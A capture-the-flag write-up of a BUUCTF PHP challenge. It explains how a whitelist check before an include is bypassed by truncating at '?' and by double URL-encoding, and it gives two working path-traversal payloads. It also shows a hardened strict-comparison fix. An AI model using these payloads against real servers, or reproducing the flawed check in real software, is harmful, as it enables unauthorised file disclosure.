BUUCTF shooting range: https://buuoj.cn/
Open the challenge and you are greeted by a big face.
Check the page source and you find a comment.
Visit source.php, and you see the following source code; let's analyze it:
    <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; // the $whitelist array holds two entries
            if (! isset($page) || !is_string($page)) {
                // check that the value exists and is a string
                echo "you can't see it";
                return false;
            }
            if (in_array($page, $whitelist)) {
                // check whether it matches $whitelist; clearly we cannot return here, because the flag we want is not in these two files, but a bypass is still possible at this point, explained in detail below
                return true;
            }
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?') // find the position of the first ? in the string
            );
            // take the substring from the start up to the ? and assign it to $_page
            // clearly this is where the check can be bypassed to obtain the flag
            if (in_array($_page, $whitelist)) {
                return true;
            }
            $_page = urldecode($page); // if the above condition fails, first perform one URL decode
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            ); // after decoding, again take the substring from the start up to the ? and assign it to $_page
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
    if (! empty($_REQUEST['file']) // check whether the file variable exists
        && is_string($_REQUEST['file']) // check whether file is a string
        && emmm::checkFile($_REQUEST['file']) // pass the file variable to checkFile in the emmm class
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
    ?>
Including hint.php gives a hint: the flag is in the ffffllllaaaagggg file.
Analyzing the above code, there are two solutions.
1. The check at the first mb_substr can be bypassed to obtain the flag. We only need to add a ? after source.php: the string up to the ? is assigned to $_page and passes the whitelist check, and the ../ after it then climbs to the parent directory that contains the flag.
payload:
source.php?file=source.php?/../../../../ffffllllaaaagggg
2. It can also be bypassed at the second mb_substr.
payload:
/source.php?file=source.php%253f/../../../../../ffffllllaaaagggg
- %25 is a percent sign (%), and %3f URL-decodes to a question mark (?).
- The browser decodes the URL once for us, turning %25 into %.
- The value is then passed into the PHP code, where the urldecode call decodes %3f into a question mark (?).
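To make the defect concrete, here is an added example (not part of the original challenge code): the decision logic of the original checkFile next to a hardened version that compares the whole value strictly against the whitelist, run against the two payloads above. The file names and inputs are taken from the page; no file is actually included.

```php
<?php
// Added example, not the challenge's own code. Only the allow/deny decision of
// each check is reproduced; nothing is included from disk.

$whitelist = ["source" => "source.php", "hint" => "hint.php"];

// Decision logic of the original checkFile: accept when the text before the
// first '?' (checked before and after one urldecode) is on the whitelist.
function checkFileVulnerable(string $page, array $whitelist): bool {
    if (in_array($page, $whitelist)) return true;
    $_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));
    if (in_array($_page, $whitelist)) return true;
    $_page = urldecode($page);
    $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?'));
    return in_array($_page, $whitelist);
}

// Hardened logic: the entire value must equal one of the whitelisted file
// names. No truncation at '?', no extra urldecode, strict comparison, so any
// trailing '?', '../' or encoded byte leads to a deny.
function checkFileHardened(string $page, array $whitelist): bool {
    return in_array($page, $whitelist, true);
}

// Constructed inputs: the two legitimate values and the page's two payloads
// (payload 2 is shown as PHP receives it, after %25 has become %).
$inputs = [
    "source.php",
    "hint.php",
    "source.php?/../../../../ffffllllaaaagggg",
    "source.php%3f/../../../../../ffffllllaaaagggg",
];

foreach ($inputs as $in) {
    printf("%-48s vulnerable=%-5s hardened=%s\n", $in,
        checkFileVulnerable($in, $whitelist) ? 'allow' : 'deny',
        checkFileHardened($in, $whitelist) ? 'allow' : 'deny');
}
```

Both payloads are allowed by the original logic and denied by the strict comparison; only the two exact whitelist entries pass the hardened check.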
This challenge is similar to the vulnerability CVE-2018-12613.